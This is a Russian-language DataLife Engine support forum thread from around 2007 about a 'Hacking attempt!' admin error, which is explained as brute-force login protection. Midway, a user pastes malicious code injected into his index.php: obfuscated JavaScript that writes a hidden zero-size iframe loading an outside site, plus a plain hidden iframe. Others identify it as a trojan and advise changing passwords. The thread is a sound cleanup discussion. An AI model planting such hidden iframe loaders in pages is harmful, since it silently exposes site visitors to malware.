Hacking attempt!

[grisharecords 0]

Hacking attempt!

и чё это знчаит?

[WMDrakon 20]

Hacking attempt!

и чё это знчаит?

Обратите внимание что в созданной вам теме вы должны указать:

1. Версию движка, которую вы используете

2. Информацию, показанную автопроверкой скрипта из админпанели

3. Подробное описание условий, при которые происходит сбой в работе движка, другими словами: пошагово отписывайте ваши действия

4. Не пишите что вы не можете установить скрипт - это ваши проблемы, либо покупайте платную службу поддержки

5. Ссылку на сайт

В случае невыполнения вышеуказанных условий ваше сообщение может быть прогнорировано.

[grisharecords 0]

может много раз не верно пытался залогинится?

Т.к. до этого всё работало нормально, такое может быть при многократной попытке залогинится?

[lifestar 18]

grisharecords

ваше сообщение может быть прогнорировано.

[Eragon 0]

может много раз не верно пытался залогинится?

Т.к. до этого всё работало нормально, такое может быть при многократной попытке залогинится?

Ну если ты много раз подряд вводил неправильный пароль в админку, то выскакивает такая ошибка. Эта защита от брута пароля админа.

[grisharecords 0]

через сколько разблокируется?

[Kaiser 2]

grisharecords,

Ты чо млять тупишь? Тебе выше WMDrakon написал сообщение, а если ты его не увидел, то подними свои шары ещё выше и увидешь закреплённое правило! Соблюдай и тебе ответят нормально!

[ReviX 0]

[Rebz 0]

тебя атаковали хакеры. мда.

[DivX 0]

Раз тут про хакеров напишу здесь.

Я немогу разобрать чей это баг скрипта или сервера.

При загрузке index.php или admin.php выполняется скрипт и начинается закачка с http://sicil.info/forum/index.php. Хотя с увереностью могу сказать что этот урл я негде непрописывал.

В html он выглядет так:

......DIV><!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) --><!-- ~ -->

<script language=Javascript>

function Ru8JBfd(R0vTTN1)

{

document.write(unescape(R0vTTN1))

return ""

}

function Zr83Uq4()

{

	var kegs = '%3c';

var zmeh = '%69%66%72%61%6d';

var igjr = '%65';

var kfyr = '%20';

var ikpd = '%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%69';

var fkba = '%63%69';

var ruxl = '%6c%2e';

var stsc = '%69%6e';

var yzvx = '%66%6f%2f%66%6f%72%75%6d%2f%69%6e%64';

var laft = '%65%78%2e%70%68';

var gokr = '%70';

var tjic = '%22%20%77%69%64%74%68%3d%22%30%22';

var uygz = '%20%68';

var ihaz = '%65%69%67%68%74%3d%22%30%22%3e%3c%2f%69';

var cylu = '%66%72%61%6d%65';

var rexp = '%3e';


var R0vTTN1=new Array()

R0vTTN1[0]=new Array(kegs+zmeh+igjr+kfyr+ikpd+fkba+ruxl+stsc+yzvx+laft+gokr+tjic+uygz+ihaz+cylu+rexp)

Ru8JBfd(R0vTTN1);

}

Zr83Uq4();

</SCRIPT>

<IFRAME src="http://sicil.info/forum/index.php" width=0 height=0></IFRAME><!-- ~ --></BODY></HTML>

Раскажите где прописан этот скрипт

[BlackM 0]

Как мне кажется, это троян/вирусняк)

[DivX 0]

Как мне кажется, это троян/вирусняк)

Ну спасибо!! Обнадежел

Только вопрос был в другом. Он вместе с движком идет или отдельно?

[celsoft 6 072]

Он вместе с движком идет или отдельно

отдельно в дистрибутиве подобного нет.

Задайте в поиске iframe и получите ответы на свои вопросы, главный вывод из этих ответов вы должны сменить пароли по FTP и проверить свой компьютер на наличие вирусов.

[DivX 0]

BlackMaster,

celsoft,

Спасибо за участие сегодня решил эту проблему так:

открыл index.php в редакторе и удалил все лишнее. На всякий случай забанел указаный хост средствами сервера и сменил пас.

ЗЫ У того якобы форума IP меняется раз в час.

Изменено 11 августа 2007 пользователем DivX

[serpantinn 0]

У меня такая же проблема как и у grisharecords, т.е. в админку захожу редактирую шаблон и т.п. всё без проблем, но при попытке изменить настройки системы выдаётся ошибка Hacking attempt! User not found . Версия движка 6.5. Раньше такого не было.

[celsoft 6 072]

serpantinn,

вас правила форума некасаются? Что за народ пошел, каждое второе сообщение с нарушением